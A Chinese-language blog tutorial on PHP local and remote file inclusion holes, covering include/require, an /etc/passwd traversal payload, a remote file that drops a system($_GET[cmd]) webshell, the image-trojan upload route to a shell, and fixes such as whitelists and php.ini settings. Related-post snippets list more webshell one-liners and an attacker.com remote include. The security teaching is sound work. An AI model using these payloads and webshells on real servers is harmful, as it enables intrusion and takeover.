文件包含漏洞

最新推荐文章于 2024-07-19 17:37:28 发布
最新推荐文章于 2024-07-19 17:37:28 发布
阅读量91 收藏
点赞数
文章标签: java php python 安全 web
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/a854596855/article/details/114920052
版权

文件包含漏洞概述

在web后台开发中,程序员往往为了提高效率以及让代码看起来更加简洁,会使用"包含"函数功能,比如把一系列功能函数都写进 fuction.php中,之后当某个文件需要调用的时候就直接在文件头中写上句<? php include fuction. php?>就可以调用函数代码.
但有些时候,因为网站功能需求,会让前端用户选择需要包含的文件(或者在前端的功能中使用了“包含”功能),又由于开发人员没有对要包含的这个文件进行安全考虑,就导致攻击着可以通过修改包含文件的位置来让后台执行任意文件(代码)。
这种情况我们称为"文件包含漏洞".

文件包含漏洞有“本地文件包含漏洞”和“远程文件包含漏洞”两种情况。

文件包含漏洞原理示意

包含函数

通过 include()或 require()语句,可以将PHP文件的内容插入另一个PHP文件(在服务器执行它之前)。
include和 require语句是相同的,除了错误处理方面

  • require会生成致命错误( E COMPILE ERROR)并停止脚本
  • include只生成警告( E WARNING),并且脚本会继续
    比如,有一个test.php
<?php $co1or='银色的'; $car='奔驰轿车'; ?>

另一个php文件包含了test.php
index.php

<html>
  <body>
    <h1>欢迎访问我的首页!</h1>
    <?php
         include 'test.php' ;
         echo "我有一辆".$color.$car;
    ?>
  </body >
</html>

本地文件包含漏洞测试

后台代码

后端对前端提交的filename参数没有处理,直接拼接成路径,交给include函数。会导致服务器上的敏感文件暴露。如将filename参数改为../../../../../../../etc/passwd,会暴露系统的口令文件

远程文件包含漏洞测试

远程文件包含漏洞形式跟本地文件包含漏洞差不多,在远程包含漏洞中,攻击着可以通过访问外部地址来加载远程的代码。
远程包含漏洞前提:如果使用的 incldue和 require,则需要 php. ini配置如下(php5.4.34)

allow_url_fopen=on //默认打开
Allow_url_include=on //默认关闭

通过远程文件包含漏洞可以包含攻击者恶意网站的php文件,比如如下面这样恶意php文件,实现在本地生成一个一句话木马。然后可以通过菜刀连接就可以访问服务器了。
test.txt

<?php
    $file = fopen('newfile.php','w');
    $txt = '<?php system($_GET[cmd]); ?>';
    fwrite($file,$txt);
    fclose($file)
?>

文件包含漏洞之文件上传漏洞的利用

一般的本地文件包含漏洞没有什么用,如果能和文件上传漏洞结合使用,就可以拿到网站服务器的shell.
思路:
1,制作一个图片木马,通过文件上传漏洞上传;
2,通过文件包含漏洞对该图片木马进行“包含”
3,获取执行结果

文件包含漏洞常见防范措施

0.在功能设计上尽量不要将文件包含函数对应的文件放给前端进行选择和操作。
1过滤各种../../,http://,https://
2.配置 php. ini配置文件

allow_url_fopen = off
Allow_url_include = off
magic_quotes_gpc=on //gpclE

3.通过白名单策略,仅允许包含运行指定的文件,其他的都禁止;

~巴哥~
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
PHP webshell
imherer的博客
06-10 666
<?php @eval($_GET['phpcode']);?> <?php @eval($_POST['phpcode']);?> <?php @system($_GET['cmd']);?> <?php @system($_POST['cmd']);?> <?php @exec($_POST['cmd']);?> <?php @passthru($_POST['cmd']);?> <?php @shell_exe...
命令执行和代码执行漏洞详解
渗透测试研究中心
08-15 984
###命令执行定义 直接调用操作系统命令: 当应用需要调用一些外部程序去处理内容的情况下,就会用到一些执行系统命令的函数。如PHP中的system,exec,shell_exec等,当用户可以控制命令执行函数中的参数时,将可注入恶意系统命令到正常命令中,造成命令执行攻击。 命令执行是指攻击者通过浏览器或者其他客户端软件提交一些cmd命令(或者bash命令)至服务器程序,服务器程序通过syst...
什么是文件包含漏洞文件包含漏洞利用方法及防御技巧
2201_75362610的博客
03-22 1822
例如,攻击者可以将 _GET[‘url’]的值,那么他们就可以在目标系统上从任意URL获取内容。例如,攻击者可以将 G​ET[′url′]的值,那么他们就可以在目标系统上从任意URL获取内容。例如,攻击者可以将_GET[‘url’]的值设置为“http://attacker.com/恶意代码.php”,这样就可以在目标系统上执行恶意代码。例如,攻击者可以将 G​ET[′file′]的值,那么他们就可以在目标系统上包含任意文件。如果攻击者能够控制包含的文件的内容,那么他们就可以在目标系统上执行任意代码。
文件包含漏洞及防御
2301_76717406的博客
03-23 2134
出现的问题:可能会导致允许访问敏感文件或者执行恶意代 码,造成漏洞;这就被称为文件包含漏洞文件包含漏洞是一种常见的Web应用程序漏洞,允许恶意用户通过在URL或表单字段中注入恶意代码来访问和执行服务器上的文件。这种漏洞通常出现在PHP等动态网页语言中,当应用程序使用用户提供的输入直接包含文件时容易发生。攻击者利用文件包含漏洞可以执行各种恶意操作,比如读取敏感文件、执行系统命令、获取数据库信息等。
PHP中常见的命令执行函数与代码执行函数
热门推荐
→_→
10-22 1万+
参考: https://blog.csdn.net/weixin_43376075/article/details/105189017 https://blog.csdn.net/qq_43168364/article/details/105595532 https://www.cnblogs.com/-qing-/p/10819069.html 代码执行函数: 1- eval() #传入的参数必须为PHP代码,既需要以分号结尾。 #命令執行:cmd=system(whoami); #菜.
web网站文件包含漏洞和攻击-运维安全详细笔记总结
06-30
web 网站文件包含漏洞和攻击-运维安全详细笔记总结 文件包含漏洞是指攻击者通过上传恶意文件,利用服务器的文件包含功能来执行恶意代码,从而获取服务器的控制权。文件包含漏洞可以分为本地文件包含漏洞和远程文件...
通达OA v11.8 getway.php 远程文件包含漏洞.md
09-07
通达OA漏洞合集
Web应用安全文件包含漏洞简介.pptx
06-18
文件包含漏洞Web应用安全领域中的一个重要话题,它主要源于开发者在编程时为了代码复用而采用的文件包含机制。这种机制允许程序动态地加载和执行存储在不同文件中的代码,但同时也为攻击者提供了可乘之机。下面将...
08_理论8_文件包含漏洞的原理与实践_20180921
02-10
08_理论8_文件包含漏洞的原理与实践_20180921
Apache Tomcat 文件包含漏洞(CNVD-2020-10487,对应 CVE-2020-1938)
03-05
CNVD-2020-10487 和 CVE-2020-1938 是同一个安全漏洞的不同命名,这个漏洞被称为“Apache Tomcat 文件包含漏洞”。此漏洞的存在使得攻击者有可能通过精心构造的请求,将恶意代码注入到Tomcat服务器上,从而执行任意...
细说——命令执行_代码执行
LainWith的博客
10-11 3394
目录原理命令执行漏洞原理代码执行漏洞原理命令执行与代码执行漏洞区别命令执行&代码执行漏洞危害命令执行无回显代码执行函数1- eval()2- assert()-最好不要加上分号作为结尾3- call_user_func()4- create_function()5- array_map()6- call_user_func_array()7- array_filter()8- uasort()函数9- preg_replace()命令执行函数1- system()2-passthru()3- exe
【渗透测试笔记】之【手动漏洞挖掘四】
AA8j的博客
07-11 202
文件上传漏洞 上传一句话木马 <?php echo shell_exec($_GET['cmd']);?> 访问该文件,并在末尾加上 ?cmd=id
PHP执行cmd方法若干
weixin_30836759的博客
09-11 896
<?php /* $action = $_GET['cmd']; echo "<pre>"; system($action); echo"<pre/>" */ /* $action = $_GET['cmd']; echo"<pre>"; echo passthru($action); echo"<pre/>"; ...
靶机练习之Billu_b0x
湿巾不湿
07-17 1038
前言 最近给体制里的人做培训,发现讲讲靶机不仅可以使他们加强对知识的综合利用,而且还可以趁机在学员心目中树立一个高大的形象(好吧,我承认我是为了拖时间)。于是下载了这个号称入门级别的渗透靶机开始渗透,顺便写个博客记录一下自己的菜鸡时光。 一、环境搭建 下载:链接:https://pan.baidu.com/s/1iCFkX4fG54Hh_UWr-EPb-Q 提取码:crg7 VMware打开虚拟机,网络设为NAT模式 如果同网段下Nmap主机发现失败,多半是网络设置没有生效,可提前在虚拟网络编辑器内将VMn
<?php eval($_POST[cmd]);?>…
senlin1202的博客
03-04 1万+
执行POST来的cmd参数语句,别人可以以任何内容提交,这个程序把提交的数据当PHP语句执行,利用这个功能可以查看甚至修改你的数据库数据和文件。使用的方法可以随便编写一个HTML来完成,例如: http://....../你的名字.php> //这里面写PHP程序,随便连接数据和修改文件都可以,当然也可以用下面的语句查看你的PHP源文件来获取数据库路径和密码 $str=f
php域名追踪后门_常用php后门网马总结分析
weixin_34611130的博客
03-08 318
php后门木马对大家来说一点都不陌生吧,但是它的种类您又知多少呢?php后门木马常用的函数大致上可分为四种类型:1. 执行系统命令: system, passthru, shell_exec, exec, popen, proc_open2. 代码执行与加密: eval, assert, call_user_func,base64_decode, gzinflate, gzuncompress, ...
Java内存模型
最新发布
weixin_44267758的博客
07-19 564
此处的变量不是指java编程中的变量,它包括了实例字段,静态字段和构成数值对象的元素,但不包括局部变量和方法参数。JMM规定所有变量都存储在主内存中。每条线程有自己的工作内存,工作内存中保留了该线程使用到变量的主内存的副本。线程对变量的所有操作都必须在工作内存中进行,不能直接读写主内存的变量,不同的线程间也无法直接访问对方工作内存的变量,线程之间的变量值传递需要通过主内存来完成。
PHP文件包含漏洞深度解析
文件包含漏洞的原理及特点:当应用程序允许用户控制包含文件的路径时,就可能出现文件包含漏洞。攻击者可以通过构造特定的输入,使得程序包含攻击者指定的文件,这可能是服务器上的任意文件,甚至远程服务器上的文件...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值